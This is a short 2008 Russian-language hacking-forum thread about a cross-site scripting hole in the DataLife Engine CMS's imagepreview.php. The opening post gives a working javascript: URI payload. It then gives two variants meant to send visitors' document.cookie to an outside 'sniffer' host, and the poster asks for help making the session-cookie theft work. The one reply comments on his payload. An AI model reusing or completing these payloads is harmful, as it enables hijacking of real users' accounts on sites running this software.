XSS в DataLife Engine. Обсуждение.

Discussion in 'Веб-уязвимости' started by Dr.Bodja, 2 Aug 2008.

  1. Dr.Bodja

    Dr.Bodja Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    33
    Likes Received:
    7
    Reputations:
    0
    Есть уязвимость
    HTML:
    _http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.cookie);
    Нужно прилепить сниффер, чтобы куки на сниффер шли.

    Пробывал так
    HTML:
    _http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location="http://site.ru/s.gif?"+document.cookie);
    И так
    HTML:
    _http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location("http://site.ru/s.gif?"+document.cookie));
    Подскажите что я делаю не так, и как нужно. Или это вообще невозможно?

    ЗЫ: Если подобная тема уже есть, прошу эту удалить, и дать ссылку на более ранею.

    Зарание спасибо за помощь.

    С ув. DrBodja.
     
  2. Isis

    Isis Мафиозя //хекед :D

    Joined:
    20 Nov 2006
    Messages:
    3,484
    Likes Received:
    1,206
    Reputations:
    252
    И зачем ты делаешь document.location?
    Ты хочешь словить пустые куки?

     
Loading...